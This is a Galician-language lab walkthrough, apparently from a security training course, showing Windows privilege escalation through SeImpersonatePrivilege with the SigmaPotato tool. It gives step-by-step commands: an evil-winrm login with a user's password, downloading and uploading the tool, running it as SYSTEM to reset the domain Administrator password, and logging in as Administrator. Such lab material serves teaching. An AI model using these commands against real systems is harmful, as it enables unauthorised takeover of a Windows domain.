Ir ao contido

Vector de Ataque: SeImpersonatePrivilege (Potato Attack)

Fase: 4. Post-Explotación
Usuario Obxectivo: maria.g.
Obxectivo Final: NT AUTHORITY\SYSTEM (Para cambiar contrasinal de Admin).

Descrición:
O privilexio SeImpersonatePrivilege permite a un usuario crear un proceso co token de acceso doutro usuario que se conecte a un "Named Pipe" propiedade do atacante.
Neste laboratorio, usaremos a ferramenta SigmaPotato. A diferenza doutros exploits que buscan abrir unha shell interactiva (o cal pode fallar ou colgarse en certas sesións remotas), SigmaPotato permite executar un comando específico con privilexios de SYSTEM de forma directa e limpa.

Diagrama de ataque

Fig. Diagrama de ataque


Procedemento Paso a Paso

1. Acceso Inicial e Verificación

Conectamos como maria.g mediante WinRM, xa que este usuario pertence ao grupo Remote Management Users.

evil-winrm -i 192.168.56.100 -u maria.g -p dragon

Unha vez dentro, verificamos que o privilexio está presente e habilitado.

*Evil-WinRM* PS C:\Users\maria.g\Documents> whoami /priv

INFORMACIÓN DE PRIVILEGIOS
--------------------------
Nombre de privilegio          Descripción                                  Estado
============================= ============================================ ==========
SeImpersonatePrivilege        Suplantar a un cliente tras la autenticación Habilitada
...

2. Selección e Descarga da Ferramenta

Usaremos SigmaPotato, unha implementación moderna dos ataques Potato deseñada para ser simple e efectiva.

Na máquina atacante (Kali):

wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.0/SigmaPotato.exe

Subida á máquina vítima (WinRM):

*Evil-WinRM* PS C:\Users\maria.g\Documents> upload SigmaPotato.exe

3. Execución do Ataque (Cambio de Contrasinal)

En lugar de tentar obter unha shell reversa ou interactiva (que a miúdo é inestable), aproveitaremos o privilexio de SYSTEM para cambiar directamente o contrasinal do Administrador do Dominio. Isto garante o acceso total inmediato.

*Evil-WinRM* PS C:\Users\maria.g\Documents> .\SigmaPotato.exe "net user Administrador 123456789"

Saída esperada: O exploit indicará que o proceso se lanzou como SYSTEM e o comando completouse correctamente.

4. Verificación: Acceso como Administrador

Agora que cambiamos o contrasinal, desconectamos a sesión de maria.g e entramos como Administrador.

# Saír da sesión actual
*Evil-WinRM* PS C:\Users\maria.g\Documents> exit

# Conectar como Administrador coa nova clave
evil-winrm -i 192.168.56.100 -u Administrador -p '123456789'

Se o login é exitoso, comprometimos totalmente o dominio.

*Evil-WinRM* PS C:\Users\Administrador\Documents> whoami
vuln-he\administrador